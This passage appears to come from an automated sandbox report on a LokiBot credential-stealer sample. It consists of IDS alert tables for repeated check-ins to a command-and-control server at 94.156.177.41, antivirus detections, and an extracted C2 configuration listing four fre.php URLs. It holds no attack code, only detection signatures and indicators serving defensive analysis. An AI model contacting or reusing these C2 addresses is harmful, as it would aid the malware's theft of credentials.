2025-01-10T23:40:03.338597+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.219923+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:05.091256+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.975511+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:06.861436+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:07.743342+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:08.645278+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:09.491507+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:10.336713+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.244942+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:12.114270+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.999101+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:13.879820+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:14.751608+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:15.631391+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:16.495720+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:17.398131+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:18.418308+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:19.336242+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:20.316028+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.201505+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:22.115264+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:23.003055+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.937030+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:24.962376+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:25.899746+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:26.796508+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:28.348116+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.251180+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:30.129740+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.989628+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:31.883334+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:32.757846+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:33.600822+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:34.524652+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:35.419613+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:36.312373+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.191586+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:38.038961+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.946533+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:39.839305+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:40.741383+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:41.627956+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:42.493662+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:43.387530+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.267924+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:45.492998+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:46.379070+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.277778+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:48.293317+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.166292+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:50.031343+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.883229+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:51.744360+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:52.588350+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:53.449991+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:54.439684+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:55.316604+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.210746+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:57.158429+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:58.050721+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.937068+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:59.854825+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:00.709875+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:01.612216+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.611717+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50082	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:39:30.033217+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.983574+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:31.786336+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:32.762986+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:33.668904+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:34.550687+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:35.593982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:36.524977+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:37.475403+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:38.368872+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.255080+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:40.181219+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:41.043838+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.946366+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:42.804638+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:43.700209+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:44.571656+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:45.467959+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:46.347914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.224865+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:48.085557+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.966901+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:49.857189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:50.736564+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:51.608218+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:52.498581+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:53.373246+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:54.280518+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.188309+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:56.120922+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:57.148898+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:58.061788+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.942881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:59.805268+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:00.712172+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:01.567820+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:02.475547+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:03.338597+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.219923+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:05.091256+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.975511+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:06.861436+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:07.743342+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:08.645278+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:09.491507+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:10.336713+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.244942+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:12.114270+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.999101+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:13.879820+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:14.751608+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:15.631391+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:16.495720+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:17.398131+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:18.418308+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:19.336242+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:20.316028+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.201505+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:22.115264+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:23.003055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.937030+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:24.962376+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:25.899746+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:26.796508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:28.348116+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.251180+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:30.129740+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.989628+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:31.883334+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:32.757846+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:33.600822+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:34.524652+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:35.419613+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:36.312373+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.191586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:38.038961+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.946533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:39.839305+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:40.741383+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:41.627956+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:42.493662+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:43.387530+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.267924+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:45.492998+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:46.379070+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.277778+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:48.293317+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.166292+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:50.031343+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.883229+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:51.744360+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:52.588350+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:53.449991+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:54.439684+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:55.316604+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.210746+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:57.158429+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:58.050721+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.937068+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:59.854825+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:00.709875+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:01.612216+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.611717+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: oAUBqI6vQ7.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://94.156.177.41/simple/five/fre.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe

Avira: detection malicious, Label: HEUR/AGEN.1306657

Found malware configuration

Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe

ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: oAUBqI6vQ7.exe	ReversingLabs: Detection: 81%
Source: oAUBqI6vQ7.exe	Virustotal: Detection: 81%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: oAUBqI6vQ7.exe

Joe Sandbox ML: detected

Source: oAUBqI6vQ7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: oAUBqI6vQ7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: rKApz.pdb source: oAUBqI6vQ7.exe, Xzacmv.exe.0.dr
Source:	Binary string: rKApz.pdbSHA256R source: oAUBqI6vQ7.exe, Xzacmv.exe.0.dr

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 4x nop then jmp 07DE9665h	0_2_07DE8C86
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 4x nop then jmp 07DE9665h	0_2_07DE938A
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 4x nop then jmp 07DE9665h	0_2_07DE93A2
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 4x nop then jmp 06FD890Dh	10_2_06FD7F2E
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 4x nop then jmp 06FD890Dh	10_2_06FD864A
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 4x nop then jmp 06FD890Dh	10_2_06FD8632

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.9:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49802 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49802 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49802 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49802 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49802 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49842 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49842 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49842 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49842 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49842 -> 94.156.177.41:80
